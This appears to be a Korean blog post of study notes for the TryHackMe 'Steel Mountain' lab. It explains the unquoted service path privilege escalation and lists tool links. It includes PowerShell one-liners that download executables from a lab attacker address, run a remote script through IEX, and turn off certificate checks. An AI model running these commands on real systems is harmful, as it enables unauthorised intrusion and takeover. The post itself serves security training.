Steel Mountain
Hack into a Mr. Robot themed Windows machine. Use metasploit for initial access, utilise powershell for Windows privilege escalation enumeration and learn a new technique to get Administrator access
Unquoted Service Path (밑에 자세히 섫명함)
[C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe]IObit 폴더에 Advanced.exe 파일을 업로드하는 이유.
- 서비스 실행 경로에서 문자열인 Advanced가 스페이스에 의해 짤리게 되고 여기에 확장자 .exe가 붙어서 이 파일이 실행되게 된다.
윈도우 커맨드
서비스 명령어
sc stop <서비스 이름>
sc start <서비스 이름>
Powershell 파일 다운로드 명령어 (2가지 방법)
c:\tmp>powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://10.11.3.30/winPEASx86.exe','winPEAS.exe')
c:\tmp>powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://10.11.3.30/new.exe','new.exe')
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http:///<script>')"
SSL 인증 무시할때에는 아래 실행 후 다운로드 하면됨
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
참고 파워쉘 경로 (full path)
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe
참고 15 Ways to Download a File
https://blog.netspi.com/15-ways-to-download-a-file
파워쉘 powerup 스크립트 사용가이드 정리
https://recipeforroot.com/advanced-powerup-ps1-usage/
https://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/
파워업 스크립트(권한상승, Enumerate)
https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
winPEAS(권한상승, 각종 정보,비번파일 ,서비스 Enumeration)
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
파워쉘 익스플로잇 치트시트
https://powersploit.readthedocs.io/en/latest/
파워쉘에서 권한상승 가이드
book.hacktricks.xyz/windows/windows-local-privilege-escalation#servicesAdvancedSystemCareSystem9
What in the world is Unquoted Service Path?
In Windows, if the service is not enclosed within quotes and is having spaces, it would handle the space as a break and pass the rest of the service path as an argument.
C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe
In order to run SomeExecutable.exe, the system will interpret this path in the following order from 1 to 5.
1. C:\Program.exe
2. C:\Program Files\A.exe
3. C:\Program Files\A Subfolder\B.exe
4. C:\Program Files\A Subfolder\B Subfolder\C.exe
5. C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe
If C:\Program.exe is not found, then C:\Program Files\A.exe would be executed.
If C:\Program Files\A.exe is not found, then C:\Program Files\A Subfolder\B.exe would be executed and so on.
참고
https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae
'OSCP > TryHackMe' 카테고리의 다른 글
| [Linux] Skynet (0) | 2020.04.23 |
|---|---|
| [Linux] Game Zone (0) | 2020.04.22 |
| [Windows] HackPark (0) | 2020.04.20 |
| [Windows] Alfred (0) | 2020.04.16 |
| [Linux] Kenobi (0) | 2020.04.14 |